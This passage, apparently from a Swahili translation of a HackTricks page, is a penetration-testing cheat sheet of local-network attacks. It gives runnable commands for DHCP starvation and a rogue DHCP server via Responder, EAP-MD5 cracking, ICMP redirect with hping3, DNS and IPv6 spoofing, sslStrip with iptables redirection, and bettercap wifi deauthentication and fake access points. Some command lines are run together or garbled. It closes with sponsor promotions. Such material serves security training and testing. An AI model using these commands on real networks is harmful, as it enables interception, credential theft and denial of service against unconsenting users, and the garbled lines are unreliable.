|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Aina mbili za DoS zinaweza kutekelezwa dhidi ya seva za DHCP. Ya kwanza inajumuisha kuiga vya kutosha vifaa bandia ili kutumia anwani zote za IP zinazowezekana.
Shambulio hili litafanikiwa tu ikiwa unaweza kuona majibu ya seva ya DHCP na kumaliza itifaki (Gundua (Comp) --> Toa (seva) --> Ombi (Comp) --> ACK (seva)). Kwa mfano, hii siwezekani kwenye mitandao ya Wifi.

Njia nyingine ya kutekeleza DoS ya DHCP ni kutuma pakiti ya DHCP-RELEASE ikitumia kila anwani ya IP inayowezekana kama chanzo. Kisha, seva itadhani kuwa kila mtu amemaliza kutumia anwani ya IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Njia ya kufanya hii kiotomatiki zaidi ni kutumia zana DHCPing

Unaweza kutumia mashambulizi ya DoS yaliyotajwa kufanya wateja wapate mikataba mpya ndani ya mazingira, na kuchosha seva halali ili ziweze kutoweka. Kwa hivyo wakati halali wanajaribu kuunganisha, unaweza kutoa thamani mbaya zilizotajwa katika shambulio lifuatalo.

Weka thamani mbaya

Seva ya DHCP ya kijanja inaweza kuwekwa kwa kutumia skripti ya DHCP iliyoko kwenye /usr/share/responder/DHCP.py. Hii ni muhimu kwa mashambulizi ya mtandao, kama kukamata trafiki na siri za HTTP, kwa kuelekeza trafiki kwenye seva mbaya. Hata hivyo, kuweka lango la kijanja ni chini ya ufanisi kwani inaruhusu tu kukamata trafiki ya kutoka kwa mteja, ikikosa majibu kutoka kwa lango halisi. Badala yake, kuweka seva ya DNS au WPAD ya kijanja kunapendekezwa kwa shambulio lenye ufanisi zaidi.

Hapa chini ni chaguo za amri za kusanidi seva ya DHCP ya kijanja:

  • Anwani yetu ya IP (Matangazo ya Lango): Tumia -i 10.0.0.100 kutangaza anwani ya IP ya mashine yako kama lango.
  • Jina la Kikoa cha DNS cha Lokali: Hiari, tumia -d example.org kuweka jina la kikoa cha DNS cha ndani.
  • Router/Gateway IP Asili: Tumia -r 10.0.0.1 kufafanua anwani ya IP ya router au lango halali.
  • Seva ya DNS ya Msingi IP: Tumia -p 10.0.0.100 kuweka anwani ya IP ya seva ya DNS ya kijanja unayoidhibiti.
  • Seva ya DNS ya Pili IP: Hiari, tumia -s 10.0.0.1 kuweka anwani ya IP ya seva ya DNS ya pili.
  • Netmask ya Mtandao wa Lokali: Tumia -n 255.255.255.0 kufafanua netmask ya mtandao wa ndani.
  • Kiolesura cha Trafiki ya DHCP: Tumia -I eth1 kusikiliza trafiki ya DHCP kwenye kiolesura cha mtandao maalum.
  • Anwani ya Usanidi wa WPAD: Tumia -w “http://10.0.0.100/wpad.dat” kuweka anwani ya usanidi wa WPAD, kusaidia katika kukamata trafiki ya wavuti.
  • Kughushi Anwani ya Lango la Kimsingi: Weka -S kughushi anwani ya IP ya lango la kimsingi.
  • Kujibu Maombi Yote ya DHCP: Weka -R kufanya seva ijibu maombi yote ya DHCP, lakini tambua kuwa hii inaleta kelele na inaweza kugunduliwa.

Kwa kutumia chaguo hizi kwa usahihi, seva ya DHCP ya kijanja inaweza kuwekwa kwa ufanisi kukamata trafiki ya mtandao.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

Mashambulizi ya EAP

Hapa kuna baadhi ya mbinu za mashambulizi zinazoweza kutumika dhidi ya utekelezaji wa 802.1X:

  • Kusagia nguvu ya nywila kwa njia ya EAP
  • Kushambulia seva ya RADIUS na yaliyomo mabaya ya EAP yaliyoharibika (exploits)
  • Kukamata ujumbe wa EAP na kuvunja nywila nje ya mtandao (EAP-MD5 na PEAP)
  • Kulazimisha uthibitishaji wa EAP-MD5 ili kupuuza ukaguzi wa cheti cha TLS
  • Kuingiza trafiki mbovu ya mtandao baada ya kujithibitisha kutumia kifaa cha kati au sawa na hilo

Ikiwa muhusika yuko kati ya muathiriwa na seva ya uthibitishaji, anaweza kujaribu kudhoofisha (ikiwa ni lazima) itifaki ya uthibitishaji hadi EAP-MD5 na kukamata jaribio la uthibitishaji. Kisha, anaweza kusagia nguvu hii kutumia:

eapmd5pass r pcap.dump w /usr/share/wordlist/sqlmap.txt

Mashambulizi ya FHRP (GLBP & HSRP)

FHRP (Itifaki ya Kwanza ya Redundancy ya Hop) ni darasa la itifaki za mtandao zilizoundwa kwa kuunda mfumo wa ujazo wa njia za redundant. Kwa FHRP, rutuba za mwili zinaweza kuunganishwa kuwa kifaa kimoja cha mantiki, ambacho huongeza uvumilivu wa hitilafu na husaidia kusambaza mzigo.

Wahandisi wa Cisco Systems wameendeleza itifaki mbili za FHRP, GLBP na HSRP.

{% content-ref url="glbp-and-hsrp-attacks.md" %} glbp-and-hsrp-attacks.md {% endcontent-ref %}

RIP

Kuna toleo tatu za Itifaki ya Taarifa ya Njia (RIP) inayojulikana: RIP, RIPv2, na RIPng. Datagrams hutumwa kwa wenzao kupitia bandari 520 kwa kutumia UDP na RIP na RIPv2, wakati datagrams hutangazwa kwa bandari ya UDP 521 kupitia IPv6 multicast na RIPng. Msaada kwa uthibitishaji wa MD5 uliingizwa na RIPv2. Kwa upande mwingine, uthibitishaji wa asili haujumuishwi na RIPng; badala yake, kutegemea vichwa vya hiari vya IPsec AH na ESP ndani ya IPv6.

  • RIP na RIPv2: Mawasiliano hufanywa kupitia datagrams za UDP kwenye bandari 520.
  • RIPng: Hutumia bandari ya UDP 521 kwa kutangaza datagrams kupitia IPv6 multicast.

Tafadhali kumbuka kuwa RIPv2 inasaidia uthibitishaji wa MD5 wakati RIPng haujumuishi uthibitishaji wa asili, ukitegemea vichwa vya IPsec AH na ESP katika IPv6.

Mashambulizi ya EIGRP

EIGRP (Itifaki ya Kuboresha Njia ya Lango la Ndani) ni itifaki ya kubadilisha njia ya kudumu. Ni itifaki ya vector ya umbali. Ikiwa hakuna uthibitishaji na usanidi wa viunganishi vya kupitisha, muingiliaji anaweza kuingilia kati na EIGRP routing na kusababisha sumu ya meza za njia. Zaidi ya hayo, mtandao wa EIGRP (yaani, mfumo wa kujitegemea) ni gorofa na haina uga wowote. Ikiwa mshambuliaji anaingiza njia, kuna uwezekano kwamba njia hii itaenea kote katika mfumo wa EIGRP wa kujitegemea.

Kushambulia mfumo wa EIGRP kunahitaji kuweka jirani na router halali wa EIGRP, ambayo inafungua fursa nyingi, kutoka upelelezi wa msingi hadi sindano mbalimbali.

FRRouting inakuruhusu kutekeleza router ya kubuni inayounga mkono BGP, OSPF, EIGRP, RIP na itifaki zingine. Unachohitaji kufanya ni kuweka kwenye mfumo wa mshambuliaji wako na unaweza kujifanya kuwa router halali katika uwanja wa routing.

{% content-ref url="eigrp-attacks.md" %} eigrp-attacks.md {% endcontent-ref %}

Coly ina uwezo wa kuvizia matangazo ya EIGRP (Itifaki ya Kuboresha Njia ya Lango la Ndani). Pia inaruhusu sindano ya pakiti, ambayo inaweza kutumika kubadilisha mipangilio ya njia.

OSPF

Katika itifaki ya Open Shortest Path First (OSPF) uthibitishaji wa MD5 mara nyingi hutumiwa kuhakikisha mawasiliano salama kati ya rutuba. Walakini, hatua hii ya usalama inaweza kukiukwa kwa kutumia zana kama Loki na John the Ripper. Zana hizi zinaweza kukamata na kuvunja vivuli vya MD5, kufunua ufunguo wa uthibitishaji. Mara ufunguo huu unapopatikana, unaweza kutumika kuleta taarifa mpya za njia. Ili kusanidi vigezo vya njia na kuanzisha ufunguo uliovunjika, vichupo vya Injection na Connection hutumiwa, mtawalia.

  • Kukamata na Kuvunja Vivuli vya MD5: Zana kama Loki na John the Ripper hutumiwa kwa lengo hili.
  • Kusanidi Vigezo vya Njia: Hii hufanywa kupitia kichupo cha Injection.
  • Kuweka Ufunguo Uliovunjika: Ufunguo unasanidiwa chini ya kichupo cha Connection.

Zana na Vyanzo Vingine vya Kawaida

  • Above: Zana ya kutafuta trafiki ya mtandao na kupata mapungufu
  • Unaweza kupata majarida zaidi kuhusu mashambulizi ya mtandao hapa.

Kughushi

Mshambuliaji huanzisha vigezo vyote vya mtandao (GW, IP, DNS) vya mwanachama mpya wa mtandao kwa kutuma majibu bandia ya DHCP.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

Kudanganya ARP

Angalia sehemu iliyopita.

ICMPRedirect

ICMP Redirect inajumuisha kutuma pakiti ya ICMP aina 1 nambari 5 inayoonyesha kuwa mshambuliaji ndiye njia bora ya kufikia anwani ya IP. Kisha, wakati waathiriwa wanapotaka kuwasiliana na anwani ya IP, watatuma pakiti kupitia kwa mshambuliaji.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

Mshambuliaji atahalalisha baadhi (au zote) za udomeni ambazo muathiriwa anauliza.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Sanidi DNS yako mwenyewe na dnsmasq

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Malango ya Kienyeji

Marudio kadhaa kwa mifumo na mitandao mara nyingi huwepo. Baada ya kujenga orodha ya anwani za MAC ndani ya mtandao wa kienyeji, tumia gateway-finder.py kutambua wenyeji wanaounga mkono uhamishaji wa IPv4.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Kughushi LLMNR, NBT-NS, na mDNS

Kwa ufumbuzi wa mwenyeji wa ndani wakati wa kutafuta DNS usiofanikiwa, mifumo ya Microsoft hutegemea Link-Local Multicast Name Resolution (LLMNR) na NetBIOS Name Service (NBT-NS). Vivyo hivyo, Apple Bonjour na utekelezaji wa Linux zero-configuration hutumia Multicast DNS (mDNS) kugundua mifumo ndani ya mtandao. Kutokana na asili isiyo na uthibitisho wa itifaki hizi na uendeshaji wao kupitia UDP, kutangaza ujumbe, wanaweza kutumiwa na wachomaji kwa lengo la kupeleka watumiaji kwenye huduma zenye nia mbaya.

Unaweza kujifanya kuwa huduma zinazotafutwa na mwenyeji kwa kutumia Responder kutuma majibu bandia.
Soma hapa habari zaidi kuhusu jinsi ya kujifanya kuwa huduma na Responder.

Kughushi WPAD

Vivinjari mara nyingi hutumia Itifaki ya Kugundua Kiotomatiki cha Wavuti (WPAD) kupata moja kwa moja mipangilio ya proxi. Hii inajumuisha kupata maelezo ya usanidi kutoka kwa seva, hasa kupitia URL kama "http://wpad.example.org/wpad.dat". Kugundua seva hii na wateja kunaweza kutokea kupitia njia mbalimbali:

  • Kupitia DHCP, ambapo ugunduzi unarahishwa kwa kutumia kuingia kwa nambari maalum ya 252.
  • Kupitia DNS, ambayo inajumuisha kutafuta jina la mwenyeji lililolabeliwa wpad ndani ya kikoa cha ndani.
  • Kupitia Microsoft LLMNR na NBT-NS, ambazo ni mbinu za kurudisha nyuma zinazotumiwa katika hali ambapo kutafuta DNS hakufanikiwa.

Zana ya Responder inatumia itifaki hii kwa kufanya kazi kama seva mbaya ya WPAD. Inatumia DHCP, DNS, LLMNR, na NBT-NS kuwapotosha wateja kuunganisha nayo. Ili kuchimba kina zaidi kuhusu jinsi huduma zinavyoweza kujifanya kutumia Responder angalia hii.

Kughushi SSDP na Vifaa vya UPnP

Unaweza kutoa huduma tofauti katika mtandao kujaribu kumdanganya mtumiaji kuingiza vitambulisho vya maandishi wazi. Maelezo zaidi kuhusu shambulio hili katika Kughushi SSDP na Vifaa vya UPnP.

Kughushi Majirani wa IPv6

Shambulio hili ni sawa sana na Kughushi ARP lakini katika ulimwengu wa IPv6. Unaweza kumfanya muathirika afikirie kuwa IPv6 ya GW ina MAC ya mchomaji.

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

Kughushi/Kufurika Kwa Matangazo ya Router ya IPv6

Baadhi ya OS huzingatia kwa chaguo-msingi lango kuu kutoka kwa pakiti za RA zilizotumwa kwenye mtandao. Ili kutangaza mshambuliaji kama router ya IPv6 unaweza kutumia:

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

Kudanganya DHCP ya IPv6

Kwa chaguo-msingi baadhi ya OS hujaribu kusanidi DNS kwa kusoma pakiti ya DHCPv6 kwenye mtandao. Kisha, mshambuliaji anaweza kutuma pakiti ya DHCPv6 ili kujisajili kama DNS. DHCP pia hutoa anwani ya IPv6 kwa muathiriwa.

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (ukurasa bandia na uingizaji wa msimbo wa JS)

Mashambulizi ya Mtandao

sslStrip

Kimsingi shambulizi hili hufanya ni, katika kesi mtumiaji anajaribu kupata ukurasa wa HTTP ambao unaelekeza kwenye toleo la HTTPS. sslStrip itaendeleza uhusiano wa HTTP na mteja na uhusiano wa HTTPS na seva ili iweze kusikiliza uhusiano huo kwa maandishi wazi.

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

Maelezo zaidi hapa.

sslStrip+ na dns2proxy kwa kuzidi HSTS

Tofauti kati ya sslStrip+ na dns2proxy dhidi ya sslStrip ni kwamba wata kupeleka kwa mfano www.facebook.com kwenda wwww.facebook.com (angalia "w" ziada) na watatuma anwani ya kikoa hiki kama IP ya mshambuliaji. Kwa njia hii, mteja atawasiliana na wwww.facebook.com (mshambuliaji) lakini nyuma ya pazia sslstrip+ itaendelea na mawasiliano halisi kupitia https na www.facebook.com.

Lengo la mbinu hii ni kuepuka HSTS kwa sababu wwww.facebook.com haitahifadhiwa kwenye cache ya kivinjari, hivyo kivinjari kitadanganywa kufanya uthibitisho wa facebook kwa njia ya HTTP.
Tambua kwamba ili kutekeleza shambulio hili, muathiriwa lazima ajaribu kwanza kupata http://www.faceook.com na sio https. Hii inaweza kufanywa kwa kubadilisha viungo ndani ya ukurasa wa http.

Maelezo zaidi hapa, hapa na hapa.

sslStrip au sslStrip+ haifanyi kazi tena. Hii ni kwa sababu kuna sheria za HSTS zilizohifadhiwa mapema kwenye vivinjari, hivyo hata kama ni mara ya kwanza mtumiaji anapata kikoa "muhimu" atafikia kupitia HTTPS. Pia, tafadhali kumbuka kwamba sheria zilizohifadhiwa mapema na sheria zingine zilizotengenezwa zinaweza kutumia bendera includeSubdomains hivyo mfano wa wwww.facebook.com kutoka awali hautafanya kazi tena kwa sababu facebook.com inatumia HSTS na includeSubdomains.

TODO: easy-creds, evilgrade, metasploit, factory

Kusikiliza TCP kwenye mlango

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL kusikiliza kwenye mlango

Zalisha funguo na cheti kilichojisajili wenyewe

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

Sikiliza kwa kutumia cheti

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Sikiliza kwa kutumia cheti na uelekeze kwa wenyeji

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

Baadhi ya nyakati, ikiwa mteja anathibitisha kuwa CA ni halali, unaweza kutumikia cheti cha jina la mwenyeji mwingine kilichosainiwa na CA.
Jaribio lingine la kuvutia, ni kutumikia cheti cha jina la mwenyeji ulioulizwa lakini kilichojisaini.

Vitu vingine vya kujaribu ni kujaribu kusaini cheti na cheti halali ambacho sio CA halali. Au kutumia funguo ya umma halali, kulazimisha kutumia algorithm kama diffie hellman (moja ambayo haitaji kufungua kitu chochote na funguo binafsi halisi) na wakati mteja anapoomba kipimo cha funguo binafsi halisi (kama hash) tuma kipimo bandia na tumaini kwamba mteja hatachunguza hili.

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Mapendekezo ya Ugunduzi wa Moja kwa Moja

Chukua kumbuka kwamba wakati pakiti ya UDP inatumwa kwa kifaa ambacho haina bandari iliyotakiwa, ICMP (Port Unreachable) hutumwa.

ARP kugundua

Pakiti za ARP hutumiwa kugundua ni IP zipi zinatumika ndani ya mtandao. Kompyuta lazima itume ombi kwa kila anwani ya IP inayowezekana na ni zile tu zinazotumiwa ndizo zitakazojibu.

mDNS (multicast DNS)

Bettercap hutoa ombi la MDNS (kila X ms) likiuliza _services_.dns-sd._udp.local kifaa kinachokiona pakiti hii kawaida hujibu ombi hili. Kisha, inatafuta tu vifaa vinavyojibu "huduma".

Vyombo

  • Avahi-browser (--all)
  • Bettercap (net.probe.mdns)
  • Responder

NBNS (NetBios Name Server)

Bettercap hutangaza pakiti kwa bandari 137/UDP likiuliza jina "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap hutangaza pakiti za SSDP kutafuta aina zote za huduma (UDP Port 1900).

WSD (Web Service Discovery)

Bettercap hutangaza pakiti za WSD kutafuta huduma (UDP Port 3702).

Marejeo


Mwongozo wa tuzo ya mdudu: jiandikishe kwa Intigriti, jukwaa la tuzo za mdudu za hali ya juu lililoanzishwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata tuzo hadi $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: